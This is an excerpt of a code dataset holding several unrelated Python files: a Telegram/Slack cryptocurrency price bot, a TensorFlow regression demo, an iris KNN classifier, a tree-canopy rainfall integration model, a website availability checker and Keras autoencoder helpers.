/ %.2f (%.2f%% wide)\" % (exchange_name, underlying, price, bid, ask, spread))\n else:\n results.append(\"%s %s price is %.4g: %.4g / %.4g (%.2f%% wide)\" % (exchange_name, underlying, price, bid, ask, spread))\n except:\n results.append(\"%s price update failed\" % exchange_name)\n else:\n results.append('%s not supported for %s' % (underlying, exchange_name))\n else:\n results.append(\"Unknown exchange: %s\" % exchange_name)\n if i >= 2:\n spread = 100 *(bestask / bestbid - 1)\n if price > 1:\n results.append(\"Max bid is on %s: %.2f\\nMin offer is on %s: %.2f.\\nBest spread is on %s: %.2f%%\\nAggregated price is %.1f%% wide (negative means arbitrageable)\" % (bestbid_exch, bestbid, bestask_exch, bestask, bestspread_exch, bestspread, spread))\n else:\n results.append(\"Max bid is on %s: %.4g\\nMin offer is on %s: %.4g.\\nBest spread is on %s: %.2f%%\\nAggregated price is %.1f%% wide (negative means arbitrageable)\" % (bestbid_exch, bestbid, bestask_exch, bestask, bestspread_exch, bestspread, spread))\n return results\n\ndef fx(underlying, exchange, cross_ccy):\n FORCCY = underlying[:3].upper()\n DOMCCY = underlying[-3:].upper()\n\n if cross_ccy in ('USD','EUR','JPY'):\n FORPAIR = DOMCCY+cross_ccy\n DOMPAIR = FORCCY+cross_ccy\n else:\n FORPAIR = cross_ccy+FORCCY\n DOMPAIR = cross_ccy+DOMCCY\n\n if exchange == \"all\":\n forExchanges = exchanges.get_exchanges_list_for_underlying(FORPAIR)\n domExchanges = exchanges.get_exchanges_list_for_underlying(DOMPAIR)\n intersectExchanges = list(set(forExchanges).intersection(domExchanges))\n elif exchange.lower() not in exchanges.get_exchanges_list():\n return ['Unsupported exchange %s' % exchange]\n else:\n if (FORPAIR in exchanges.get_exchange(exchange.lower()).get_supported_underlyings()) and (DOMPAIR in exchanges.get_exchange(exchange.lower()).get_supported_underlyings()):\n intersectExchanges = [exchange]\n else:\n return [\"Exchange %s does not support %s and %s\" % (exchange, FORPAIR, DOMPAIR)]\n results = []\n if not intersectExchanges:\n return [\"No exchange supports %s and %s\" % (FORPAIR, DOMPAIR)]\n\n try:\n e = exchanges.get_exchange(intersectExchanges[0].lower())\n fxRate = float(e.get_quote(underlying,'last'))\n results.append('%s rate for %s is %.5g' % (intersectExchanges[0], underlying, fxRate))\n except:\n url = 'http://www.apilayer.net/api/live?access_key='+CL_API_KEY+'¤cies='+FORCCY+','+DOMCCY\n r = requests.get(url)\n r.raise_for_status()\n j = r.json()\n if j['success'] and 'quotes'in j:\n if 'USD'+DOMCCY in j['quotes'] and 'USD'+FORCCY in j['quotes']:\n domOfficialRate = j['quotes']['USD'+DOMCCY]\n forOfficialRate = j['quotes']['USD'+FORCCY]\n fxRate = domOfficialRate / forOfficialRate\n results.append('Currency Layer %s FX rate is %.5g' % (underlying, fxRate))\n else:\n fxRate = 0\n results.append('Could not retrieve %s FX rate from CurrencyLayer' % underlying)\n else:\n fxRate = 0\n results.append('Could not retrieve %s FX rate from CurrencyLayer' % underlying)\n\n results.append('Using %s as the cross currency: %s and %s' % (cross_ccy.upper(), FORPAIR, DOMPAIR))\n\n for exch in intersectExchanges:\n e = exchanges.get_exchange(exch.lower())\n try:\n fx_bid = e.get_quote(DOMPAIR,'bid') / e.get_quote(FORPAIR,'ask')\n fx_ask = e.get_quote(DOMPAIR,'ask') / e.get_quote(FORPAIR,'bid')\n if fxRate != 0 and (fx_bid > fxRate or fx_ask < fxRate):\n if fx_bid > fxRate:\n arb = 100 * (float(fx_bid) / fxRate - 1)\n else:\n arb = 100 * (fxRate / float(fx_ask) - 1)\n results.append('%s on %s: bid %.5g / %.5g ask. %.2f%% arb vs %.5g official rate' % (underlying, exch, fx_bid, fx_ask, arb, fxRate))\n else:\n results.append('%s on %s: bid %.5g / %.5g ask' % (underlying, exch, fx_bid, fx_ask))\n except ZeroDivisionError:\n results.append('%s: one of the quotes is worth 0' % exch)\n return results\n\ndef priceMsg(update, context):\n logger.info(\"Received /price command from %s\" % update.effective_user)\n logger.info(\"Command content: %s\" % update.message.text)\n if update.message.text.split().__len__() <= 2:\n update.message.reply_text('Syntax is \"/price <...>\".\\nTry \"/price all\" to price your underlying on all supported exchanges.\\nType /list to see supported exchanges')\n return\n underlying = update.message.text.split()[1].upper()\n exchange_list = update.message.text.split()[2:]\n if exchange_list == []:\n exchange_list = ['all']\n messages = price(underlying, exchange_list)\n update.message.reply_text('\\n'.join(messages))\n\ndef fxMsg(update, context):\n logger.info(\"Received /fx command from %s\" % update.effective_user)\n logger.info(\"Command content: %s\" % update.message.text)\n if update.message.text.split().__len__() <= 2:\n update.message.reply_text('Syntax is \"/fx \".\\nTry \"/fx all eth\" to price your underlying on all supported exchanges with eth as the cross cryotocurrency.\\nType /list to see supported exchanges')\n return\n underlying = update.message.text.split()[1].upper()\n exchange_list = update.message.text.split()[2]\n if update.message.text.split().__len__() == 4:\n cross_ccy = update.message.text.split()[3].upper()\n else:\n if underlying[-3:].upper() == 'BTC' or underlying[:3].upper() == 'BTC':\n cross_ccy = 'USD'\n else:\n cross_ccy = 'BTC'\n if exchange_list == []:\n update.message.reply_text('No exchange specified. Try all or gatecoin for example')\n return\n messages = fx(underlying, exchange_list, cross_ccy)\n update.message.reply_text('\\n'.join(messages))\n\ndef inline_query(update, context):\n query = update.inline_query.query\n if not query:\n return\n logger.info(\"Inline query received from %s: %s\" % (update.inline_query.from_user, query))\n results = list()\n query_type = query.split()[0]\n messages = [BOTNAME]\n if query_type.lower() == 'price':\n if query.split().__len__() <= 2:\n return\n underlying = query.split()[1].upper()\n exchange_list = query.split()[2:]\n if exchange_list == []:\n return\n messages.extend(price(underlying, exchange_list))\n elif query_type.lower() == 'list':\n messages.append(list_text())\n else:\n messages.append('Try ' + BOTNAME + ' price bitcoin bitfinex, or ' + BOTNAME + ' list')\n reply_text = '\\n'.join(messages)\n results.append(InlineQueryResultArticle(id=uuid4(), title='Enter to display results', input_message_content=InputTextMessageContent(reply_text)))\n bot.answer_inline_query(update.inline_query.id, results)\n\ndef error(update, context):\n logger.warn('Update \"%s\" caused error \"%s\"' % (update, context.error))\n\ndef main_telegram():\n # Create the EventHandler and pass it to the bot's token\n updater = Updater(token=TOKEN, use_context=True)\n\n # Get the dispathcher to register handlers\n dispatcher = updater.dispatcher\n\n # Add handlers\n start_handler = CommandHandler('start', startMsg)\n list_exchanges_handler = CommandHandler('list', listExchangesMsg)\n price_handler = CommandHandler('price', priceMsg)\n fx_handler = CommandHandler('fx',fxMsg)\n exchange_handler = CommandHandler('exchange',exchangeMsg)\n summary_handler = CommandHandler('summary',summaryMsg)\n bitmex_handler = CommandHandler('bitmex', bitmexMsg)\n inline_query_handler = InlineQueryHandler(inline_query)\n dispatcher.add_handler(start_handler)\n dispatcher.add_handler(list_exchanges_handler)\n dispatcher.add_handler(price_handler)\n dispatcher.add_handler(fx_handler)\n dispatcher.add_handler(exchange_handler)\n dispatcher.add_handler(summary_handler)\n dispatcher.add_handler(bitmex_handler)\n dispatcher.add_handler(inline_query_handler)\n\n unknown_handler = MessageHandler(Filters.text, unknownMsg)\n dispatcher.add_handler(unknown_handler)\n\n # log all errors\n dispatcher.add_error_handler(error)\n\n # start the bot\n logger.info(\"Starting bot.\")\n updater.start_polling()\n\n # The above runs the bot until CTRL-C or SIGINT, SIGTERM, or SIGABRT is\n # received. start_polling() is non-blocking and this will stop the bot\n # gracefully\n updater.idle()\n logger.info(\"Exiting bot.\")\n\ndef slack_parse_bot_commands(bot_id, slack_events):\n for event in slack_events:\n if event[\"type\"] == \"message\" and not \"subtype\" in event:\n matches = re.search(SLACK_MENTION_REGEX, event[\"text\"])\n user_id, message = (matches.group(1), matches.group(2).strip()) if matches else (None, None)\n if user_id == bot_id:\n return message, event[\"channel\"]\n return None, None\n\ndef slack_handle_command(client, command, channel):\n default_response = \"Not sure what you mean. Try:\\n *summary* \\n *fx* \\n *bitmex* \\n *price* \"\n response = None\n if command.lower().startswith(\"summary\"):\n if command.split().__len__() <= 1:\n ccy = ['globalsummary']\n else:\n ccy = command.split()[1:]\n response = '\\n'.join(summary(ccy))\n elif command.lower().startswith(\"fx\"):\n if command.split().__len__() <= 2:\n response = 'Syntax is \"*fx* \".\\nTry \"*fx* all eth\" to price your underlying on all supported exchanges with eth as the cross ccy.'\n else:\n underlying = command.split()[1].upper()\n exchange_list = command.split()[2]\n if command.split().__len__() >= 4:\n cross_ccy = command.split()[3].upper()\n else:\n if underlying[-3:].upper() == 'BTC' or underlying[:3].upper() == 'BTC':\n cross_ccy = 'USD'\n else:\n cross_ccy = 'BTC'\n if exchange_list == []:\n response = 'No exchange specified. Try all or gdax for example'\n else:\n messages = fx(underlying, exchange_list, cross_ccy)\n response = '\\n'.join(messages)\n elif command.lower().startswith(\"bitmex\"):\n if command.split().__len__()<=1:\n response = \"Syntax is *bitmex* . For example *bitmex* XBTM18\"\n else:\n futlist = command.upper().split()[1:]\n message_text = \"\"\n for i, fut in enumerate(futlist):\n message_text+=bitmex(fut)\n if i != len(futlist)-1:\n message_text+='\\n------------\\n'\n response = message_text\n elif command.lower().startswith(\"price\"):\n if command.split().__len__() <= 2:\n response = 'Syntax is \"*price* <...>\".\\nTry \"*price* all\" to price your underlying on all supported exchanges.'\n else:\n underlying = command.split()[1].upper()\n exchange_list = command.split()[2:]\n if exchange_list == []:\n exchange_list = ['all']\n messages = price(underlying, exchange_list)\n response = '\\n'.join(messages)\n client.api_call(\"chat.postMessage\",channel=channel,text=response or default_response)\n\ndef main_slack():\n # instantiate Slack client\n slack_client = slack.WebClient(SLACK_BOT_TOKEN)\n slack_bot_id = None\n # Constants\n RTM_READ_DELAY = 1 # 1 second delay between reading from RTM\n\n if slack_client.rtm_connect(with_team_state=False, auto_reconnect=True):\n logger.info(\"Slack Bot connected and running!\")\n # Read bot's user ID by calling Web API method `auth.test`\n slack_bot_id = slack_client.api_call(\"auth.test\")[\"user_id\"]\n while slack_client.server.connected is True:\n command, channel = slack_parse_bot_commands(slack_bot_id, slack_client.rtm_read())\n if command:\n slack_handle_command(slack_client, command, channel)\n time.sleep(RTM_READ_DELAY)\n else:\n logger.error(\"Connection failed. Exception traceback printed above\")\n\nif __name__ == '__main__':\n if len(sys.argv) > 1 and sys.argv[1].lower() == 'slack':\n main_slack()\n else:\n main_telegram()\n\n","sub_path":"examples/cryptohelper.py","file_name":"cryptohelper.py","file_ext":"py","file_size_in_byte":24692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"42657483","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 21 14:51:55 2013\n\n@author: cimatori\n\"\"\"\n\n# 1. General data parameters\n\n# File with processed data\nDataFile = '/home/cimatori/Analyses/Meteor18days/ProcessData/results/Output_data_detail.hdf'\n\n# Get data from these dates\nStart = 140.4\nEnd = 158.5\n\n# 2. Various plotting and saving parameters\n#Output directory\nOutDir = '/home/cimatori/Analyses/Meteor18days/Overturning/'\n# Time of detail plots\nDetStart = 146.57\nDetEnd = 146.59\n\n# Parameters for hdf file\nhdfopt = dict(dtype='float32', compression='gzip', fillvalue=-9.99e30)\n\n# number of points for smooting line plots\nnWin = 120*2\n# Number of points for vertically smooting N\nzWin = 4\n\n\n# 3. Parameters for overturning analysis\nStep = 10 # s subsampling time step to use for analysis\n","sub_path":"Meteor18days/Overturning/ConfigOverturning1.py","file_name":"ConfigOverturning1.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"169815704","text":"# -*- coding: utf-8 -*-\n# @Author: ShuaiYang\n# @Date: 2019-04-02 16:57:49\n# @Last Modified by: [ShuaiYang]\n# @Last Modified time: 2019-04-09 19:21:52\n# https://blog.csdn.net/dufufd/article/details/78931840\nimport tensorflow as tf\nprint(\"true data ->>\",4.8, 8.5, 10.4, 21.0, 25.3)\n\n# 创建变量 W 和 b 节点,并设置初始值\nW = tf.Variable([.1], dtype=tf.float32)\nb = tf.Variable([-.1], dtype=tf.float32)\n# 创建 x 节点,用来输入实验中的输入数据\nx = tf.placeholder(tf.float32)\n# 创建线性模型\nlinear_model = W*x + b\n \n# 创建 y 节点,用来输入实验中得到的输出数据,用于损失模型计算\ny = tf.placeholder(tf.float32)\n# 创建损失模型\nloss = tf.reduce_sum(tf.square(linear_model - y))\n \n# 创建 Session 用来计算模型\nsess = tf.Session()\ninit = tf.global_variables_initializer()\nsess.run(init)\nprint(sess.run(linear_model, {x: [1, 2, 3, 6, 8]}))\nprint(sess.run(loss, {x: [1, 2, 3, 6, 8], y: [4.8, 8.5, 10.4, 21.0, 25.3]}))\n\n\n# 给 W 和 b 赋新值\nfixW = tf.assign(W, [2.])\nfixb = tf.assign(b, [1.])\n# run 之后新值才会生效\nsess.run([fixW, fixb])\n# 重新验证损失值\nprint(sess.run(linear_model, {x: [1, 2, 3, 6, 8]}))\n\nprint(sess.run(loss, {x: [1, 2, 3, 6, 8], y: [4.8, 8.5, 10.4, 21.0, 25.3]}))\n\n# 创建一个梯度下降优化器,学习率为0.001\noptimizer = tf.train.GradientDescentOptimizer(0.001)\ntrain = optimizer.minimize(loss)\n \n# 用两个数组保存训练数据\nx_train = [1, 2, 3, 6, 8]\ny_train = [4.8, 8.5, 10.4, 21.0, 25.3]\n \n# 训练10000次\n# for i in range(10000):\n# sess.run(train, {x: x_train, y: y_train})\n \n# # 打印一下训练后的结果\n# print('W: %s b: %s loss: %s' % (sess.run(W), sess.run(b), sess.run(loss, {x: x_train , y: y_train})))\n\n# # 重新验证损��值\n# print(\"重新验证损失值 - >\")\n# print(sess.run(linear_model, {x: [1, 2, 3, 6, 8]}))","sub_path":"netTestCode/testModel.py","file_name":"testModel.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"236329217","text":"# -*- coding: utf-8 -*-\nimport yaml\nimport os\nfrom models.dataset import Dataset\n\ndef load():\n datasets = dict()\n path = os.path.dirname(__file__) + \"/config/datasets.yaml\" \n\n with open(path, \"r\") as f:\n dsets = yaml.load(f)\n for d in dsets:\n datasets[d['id']] = Dataset(d['id'], d['name'], download_link=d.get('download_link'))\n return datasets","sub_path":"kartskrape/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"405236436","text":"from sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.datasets import load_iris\nfrom sklearn.cross_validation import KFold\nfrom matplotlib import pyplot as plt\nfrom matplotlib.colors import ListedColormap\nimport numpy as np\n\n\ndataset = load_iris()\n\nfeatures = dataset.data\nfeatur_names = list(dataset.feature_names)\ntarget = dataset.target\ntarget_names = list(dataset.target_names)\n\nmarkers = ['bo', 'rs', 'g^']\n\nfor t in range(3):\n plt.plot(features[target == t, 2], features[target == t, 0], markers[t], label=target_names[t])\nplt.grid(True)\nplt.legend()\nplt.show()\n\nclassifier = KNeighborsClassifier(n_neighbors=1)\nmean = []\n\nfor training, testing in KFold(len(features), n_folds=5, shuffle=True):\n classifier.fit(features[training], target[training])\n prediction = classifier.predict(features[testing])\n mean.append(np.mean(prediction == target[testing]))\n\nprint(\"Accuracy at every step: %s\" % ', '.join(['%s : %s' % (str(mean.index(i)), i) for i in mean]))\nprint(\"Average accuracy = %f\" % np.mean(mean))\nprint(\"Median accuracy = %f\" % np.median(mean))\n","sub_path":"knn/iris.py","file_name":"iris.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"639441983","text":"#epsabs=1.49e-06, epsrel=1.49e-06#精度\nimport numpy\nimport scipy.integrate\nimport matplotlib.pyplot\nfrom mpl_toolkits.mplot3d import Axes3D\nimport csv\n#initial_value:冠幅,间距,冠高,面积,宽,长,分段个数,R, B, H, square_dm, s_length, step_point, accept_p\ndef m_s(initial_value):\n accept_p = numpy.zeros(2)\n #基本参数设置\n R, B, H, S, length, step_point, accept_p[0], accept_p[1] = initial_value\n width = length\n V_square = S * H\n R2 = pow(R, 2)\n step_range = range(0, step_point, 1)#生成分割序列\n mode_limit = R + B / 2\n d_limit = mode_limit / (step_point - 1)#分割段长度\n rain_out = pow(mode_limit, 2) * H\n\n #四个树冠的圆心\n def canopy_center():#四个树冠的圆心\n canopy_center_point = numpy.zeros((4, 2))\n canopy_center_point[0][0] = 0\n canopy_center_point[0][1] = 0\n canopy_center_point[1][0] = 2 * R + B\n canopy_center_point[1][1] = 0\n canopy_center_point[2][0] = 2 * R + B\n canopy_center_point[2][1] = 2 * R + B\n canopy_center_point[3][0] = 0\n canopy_center_point[3][1] = 2 * R + B\n return canopy_center_point\n canopy_dot = canopy_center()#四个树冠的圆心\n #第i个树冠体积函数\n def f_canopy(i):#i=tree_num\n return lambda x, y: H - numpy.sqrt((x - canopy_dot[i][0]) ** 2 + (y - canopy_dot[i][1]) ** 2) * H / R\n #第i个树冠的上半圆函数\n def f_up_canopy(i):#i=tree_num\n return lambda x: canopy_dot[i][1] + numpy.sqrt(R2 - (x - canopy_dot[i][0]) ** 2)#上半圆函数\n #第i个树冠的下半圆函数\n def f_down_canopy(i):#i=tree_num\n return lambda x: canopy_dot[i][1] - numpy.sqrt(R2 - (x - canopy_dot[i][0]) ** 2)#下半圆函数\n #生成水槽中心点数组,第一维:某点的穿透雨量、X轴坐标、Y轴坐标,第二维X轴定值的Y轴点集合,第三维X轴的集合\n ucs = numpy.zeros((step_point, step_point, 3))#中心点数组:截留量、X、Y坐标\n #对水槽中心点数组赋值X、Y坐标\n for i in step_range:#对水槽中心点数组赋值X、Y坐标\n for j in step_range:\n ucs[i][j][1] = d_limit * i\n ucs[i][j][2] = d_limit * j\n #赋值:xa,xb,2个ab交点,2个cd焦点和圆左右边界 的X轴坐标集合,8个数,分段积分:7段\n def intersection_point_sequence(tree, rec_arr):\n r_i_s_get = numpy.zeros(8)\n r_i_s_get[0] = rec_arr[0][0]#长方形xa\n r_i_s_get[1] = rec_arr[1][0]#长方形xb\n r_i_s_get[2] = rec_arr[0][0] # 长方形ab的第一个交点\n r_i_s_get[3] = rec_arr[0][0] # 长方形ab的第二个交点\n r_i_s_get[4] = rec_arr[0][0] # 长方形cd的第一个交点\n r_i_s_get[5] = rec_arr[0][0] # 长方形cd的第二个交点\n r_i_s_get[6] = canopy_dot[tree][0] - R#树冠左边界\n r_i_s_get[7] = canopy_dot[tree][0] + R#树冠右边界\n #ab与树冠圆心距离的绝对值\n y_ab = abs(canopy_dot[tree][1] - rec_arr[0][1])\n #cd与树冠圆心距离的绝对值\n y_cd = abs(canopy_dot[tree][1] - rec_arr[3][1])\n if y_ab < R:\n # 长方形ab的第一个交点\n r_i_s_get[2] = canopy_dot[tree][0] - numpy.sqrt(R2 - y_ab ** 2)\n # 长方形ab的第二个交点\n r_i_s_get[3] = canopy_dot[tree][0] + numpy.sqrt(R2 - y_ab ** 2)\n if y_cd < R:\n # 长方形cd的第一个交点\n r_i_s_get[4] = canopy_dot[tree][0] - numpy.sqrt(R2 - y_cd ** 2)\n # 长方形cd的第二个交点\n r_i_s_get[5] = canopy_dot[tree][0] + numpy.sqrt(R2 - y_cd ** 2)\n return sorted(r_i_s_get)#排升序\n #对各长方形4个点赋值,并求与4个树冠相交部分的截留量\n for one_dimensional in ucs:#第一维\n for two_dimensional in one_dimensional:#第二维\n suqare = numpy.zeros((4, 2)) # 生成长方形4个点的数组\n canopy_interception = numpy.zeros(4) # 4个树冠的截留量\n half_width = width / 2\n half_length = length / 2\n suqare[0][0] = two_dimensional[1] - half_width#xa\n suqare[0][1] = two_dimensional[2] - half_length#ya\n suqare[1][0] = two_dimensional[1] + half_width#xb\n suqare[1][1] = two_dimensional[2] - half_length#yb\n suqare[2][0] = two_dimensional[1] + half_width#xc\n suqare[2][1] = two_dimensional[2] + half_length#yc\n suqare[3][0] = two_dimensional[1] - half_width#xd\n suqare[3][1] = two_dimensional[2] + half_length#yd\n #xa,xb,2个ab交点,2个cd焦点,R的集合,分段积分-6段\n for tree in range(0, 4, 1):\n #第i个树冠的分段截留量\n rain_i = numpy.zeros(7)\n #交点赋值\n s_i_s = intersection_point_sequence(tree, suqare)\n left_limit = max(suqare[0][0], canopy_dot[tree][0] - R)\n right_limit = min(suqare[1][0], canopy_dot[tree][0] + R)\n for i in range(0, 7, 1):\n if left_limit <= s_i_s[i] < s_i_s[i+1] <= right_limit:\n a = s_i_s[i]\n b = s_i_s[i + 1]\n midpoint_x = (a + b) / 2\n canopy_mid_down_y = f_down_canopy(tree)(midpoint_x)\n canopy_mid_up_y = f_up_canopy(tree)(midpoint_x)\n if canopy_mid_down_y >= suqare[3][1] or canopy_mid_up_y <= suqare[0][1]:\n continue\n if canopy_mid_down_y > suqare[0][1]:\n func_g = f_down_canopy(tree)\n else:\n func_g = suqare[0][1]\n if canopy_mid_up_y < suqare[3][1]:\n func_h = f_up_canopy(tree)\n else:\n func_h = suqare[3][1]\n rain_i[i] = scipy.integrate.dblquad(f_canopy(tree), a, b, func_g, func_h,\n epsabs=1.49e-06, epsrel=1.49e-06)[0]\n canopy_interception[tree] = numpy.sum(numpy.abs(rain_i))\n two_dimensional[0] = 100 * (V_square - numpy.sum(canopy_interception))/V_square\n #生成X,Y的集合\n # ucs_x = numpy.linspace(0, mode_limit, step_point)\n # ucs_y = numpy.linspace(0, mode_limit, step_point)\n # UX, UY = numpy.meshgrid(ucs_x, ucs_y)#meshgrid函数用两个坐标轴上的点在平面上画格\n #生成穿透雨量的二维矩阵,并赋值\n ucs_rain = numpy.zeros((step_point, step_point))\n #ucs_rain_T = numpy.zeros(step_point, step_point)\n square_p_num = 0\n for i in step_range:#第一维\n for j in step_range:#第二维\n ucs_rain[j][i] = ucs[i][j][0]\n #ucs_rain_T[i][j] = ucs[i][j][0]\n if accept_p[0] < ucs[i][j][0] < accept_p[1]:\n square_p_num = square_p_num + 1\n return square_p_num\n# initial_value = [30, 10 ,50, 10, 10, 1, 36, [18.450429643955072, 27.67564446593261]]\n# print (m_r(initial_value))\n\n","sub_path":"throughfall rain mode/mode_rain_through_1rt/mode_square.py","file_name":"mode_square.py","file_ext":"py","file_size_in_byte":7167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"578081643","text":"import socket\r\nimport sys\r\nfrom time import sleep\r\nfrom url_db import Urls\r\nimport argparse\r\nimport winsound\r\n\r\nurls_db=Urls()\r\n\r\n#urls=['www.facebook.com','www.google.com','www.twitter.com','www.instagram.com','www.github.com']\r\n\r\ndef check(url):\r\n\r\n ndex=url.find('w.')\r\n short_url=url[ndex+2:].capitalize()\r\n while True:\r\n try:\r\n print(f\"Evaluating connection to {url}.... \")\r\n s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) # IPV4 , TCP\r\n s.settimeout(2)\r\n s.connect((url,80))\r\n s.close()\r\n print(f'{short_url} is up\\n')\r\n return 1\r\n sleep(1)\r\n except Exception:\r\n print(f'{short_url} is down\\n')\r\n return 0\r\n sleep(1)\r\n sys.exit(0)\r\n\r\n\r\ndef parse():\r\n parser=argparse.ArgumentParser()\r\n group = parser.add_mutually_exclusive_group()\r\n parser.add_argument(\"-e\",\"--execute\",help=\"Executes the script\",action=\"store_true\" )\r\n group.add_argument(\"-v\",\"--view_url\",help=\"View all the urls store in the database\",action=\"store_true\")\r\n group.add_argument(\"-a\",\"--add_url\",help=\"Add a url formatted as : www.url.domain\",action=\"store\")\r\n parser.add_argument(\"-i\",\"--interval\",help=\"Choose the interval of the program execution\",action=\"store\")\r\n group.add_argument(\"-d\",\"--delete\",help=\"Delete a url from the database ; specify the url formatted as : www.url.domain\",action=\"store\")\r\n\r\n args=parser.parse_args()\r\n\r\n command=args.execute\r\n interval=args.interval\r\n if args.execute:\r\n get_urls=urls_db.view_urls()\r\n while True:\r\n for i in range(int(urls_db.count_rows()[0][0])):\r\n current_status=check(get_urls[i][0])\r\n if current_status==1:\r\n urls_db.cur.execute(\"UPDATE urls SET curS=? WHERE url=?\",(1,get_urls[i][0]))\r\n urls_db.con.commit()\r\n if urls_db.status_changed(get_urls[i][0]):\r\n notify()\r\n elif current_status==0:\r\n urls_db.cur.execute(\"UPDATE urls SET curS=? WHERE url=?\",(0,get_urls[i][0]))\r\n urls_db.con.commit()\r\n if urls_db.status_changed(get_urls[i][0]):\r\n notify()\r\n urls_db.update_status(get_urls[i][0])\r\n if interval is not None:\r\n sleep(int(interval))\r\n else:\r\n sleep(5)\r\n elif args.view_url:\r\n get_urls=urls_db.view_urls()\r\n #print(get_urls)\r\n\r\n elif args.add_url:\r\n urls_db.insert_url(args.add_url)\r\n\r\n elif args.delete:\r\n urls_db.delete(args.delete)\r\n\r\ndef notify():\r\n duration=1000 #milliseconds\r\n freq=440 #hz\r\n winsound.Beep(duration,freq)\r\n\r\nif __name__=='__main__':\r\n parse()\r\n\r\n\r\n#for url in urls:\r\n #urls_db.insert_url(url)\r\n\r\n#urlview=urls_db.view_table()\r\n#get_urls=urls_db.view_urls()\r\n#print(get_urls)\r\n#for i in range (5):\r\n# check(get_urls[i][0])\r\n#for url in urlview\r\n","sub_path":"connection_check/conn_check.py","file_name":"conn_check.py","file_ext":"py","file_size_in_byte":3048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"298997317","text":"from tensorflow.keras.preprocessing.image import load_img, img_to_array, array_to_img\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport numpy as np\nimport random as random\nimport math as math\nimport copy\nfrom PIL import Image\nfrom os import listdir, mkdir\nfrom os.path import isdir, isfile, join\n\n\ndef emptyFile(filePath):\n fileToEmpty = open(filePath, 'w')\n fileToEmpty.write('')\n fileToEmpty.close()\n\n\ndef getPrecentText(subCount, totalCount):\n return \"{:.2f}%\".format(100 * (subCount / totalCount))\n\n\ntempOutputFile = None\ndef saveModelSummary(model, outputFilePath):\n def writeLineToOutputFile(line):\n tempOutputFile.write(line + '\\n')\n emptyFile(outputFilePath)\n tempOutputFile = open(outputFilePath, 'a')\n model.summary(print_fn=writeLineToOutputFile)\n tempOutputFile.close()\n\n\ndef getNoisyVariants(originalImages, directoryPath):\n noisyImages = []\n # Either load from a file, or create new ones\n if (isdir(directoryPath) and isfile(join(directoryPath, 'image_0.jpg'))):\n print('\\nUsing saved noisy images from: ' + directoryPath)\n fileNames = [fileName for fileName in listdir(directoryPath) if isfile(join(directoryPath, fileName))]\n for fileName in fileNames:\n filePath = directoryPath + '/' + fileName\n image = img_to_array(load_img(filePath, color_mode=\"grayscale\"))\n noisyImages.append(image)\n else: # If no save images were found, then generate new ones\n #mkdir(directoryPath)\n print('\\nAdding noise and saving to: ' + directoryPath)\n imageCount = len(originalImages)\n imageIndex = 0\n # Copy the images so we don't overwrite anything\n copiesOfOriginalImages = []\n for originalImage in originalImages:\n copiesOfOriginalImages.append(copy.deepcopy(originalImage))\n # Add gaussian noise to each image\n for originalImage in copiesOfOriginalImages:\n image = originalImage.reshape((28, 28))\n gaussianMask = np.random.normal(0.0, 1.0, (28, 28))\n for x in range(28):\n for y in range(28):\n image[x, y] = np.average([image[x, y], gaussianMask[x][y]], weights=[1, 1])\n image = image.reshape((28, 28, 1))\n array_to_img(image).save(directoryPath + '/image_' + str(imageIndex) + '.jpg')\n noisyImages.append(image)\n imageIndex += 1\n if (imageIndex % math.floor(imageCount / 20) == 0):\n print('Completed ' + str(imageIndex) + ' of ' + str(imageCount) + ' images.')\n return np.array(noisyImages)\n\n\ndef plotTrainAndTestLoss(trainLoss, testLoss, filePath):\n plt.figure()\n plt.xlabel('epochs')\n plt.ylabel('loss')\n plt.ylim([0, 1])\n plt.plot(trainLoss, color='#FF0000', label='Trainning Data')\n plt.plot(testLoss, color='#0000FF', label='Test Data')\n plt.legend()\n plt.savefig(filePath)\n\n\ndef printSomeAutoencoderSamples(autoencoder, testImages, expectedImages=None, filePath='output/autoencoder_samples.jpg'):\n # Figure out the plot configuration\n subplotRowCount = 2\n if (expectedImages is not None):\n subplotRowCount = 3\n fig, subplots = plt.subplots(subplotRowCount, 4)\n\n # Print a few images\n for sampleIndex in range(4):\n # Get the input image\n imageIndex = random.randint(0, len(testImages) - 1)\n rawInputImage = testImages[imageIndex]\n printableInputImage = rawInputImage.reshape((28, 28))\n\n # Get the output image\n rawOutputImage = autoencoder.predict(np.array([rawInputImage]))[0]\n printableOutputImage = rawOutputImage.reshape((28, 28))\n\n # Add the input and output images to the figure\n subplots[0, sampleIndex].axis('off')\n subplots[0, sampleIndex].title.set_text('Input ' + str(sampleIndex + 1))\n subplots[0, sampleIndex].imshow(printableInputImage, cmap=plt.get_cmap('gray'))\n subplots[1, sampleIndex].axis('off')\n subplots[1, sampleIndex].title.set_text('Output ' + str(sampleIndex + 1))\n subplots[1, sampleIndex].imshow(printableOutputImage, cmap=plt.get_cmap('gray'))\n if (expectedImages is not None):\n printableExpectedImage = expectedImages[imageIndex].reshape((28, 28))\n subplots[2, sampleIndex].axis('off')\n subplots[2, sampleIndex].title.set_text('Expected ' + str(sampleIndex + 1))\n subplots[2, sampleIndex].imshow(printableExpectedImage, cmap=plt.get_cmap('gray'))\n plt.savefig(filePath)\n\n\ndef plotABunchOfEncoderSamplesForEachFashionClass(encode, testImages, testClassLabels, filePath):\n plt.figure()\n colorsByClass = getADiverseSetOfColor(10)\n maxX = 0.1\n maxY = 0.1\n\n # Sort the test images by class\n testImagesByClass = [[] for _ in range(10)]\n for testImageIndex in range(len(testImages)):\n testImage = testImages[testImageIndex]\n classIndex = 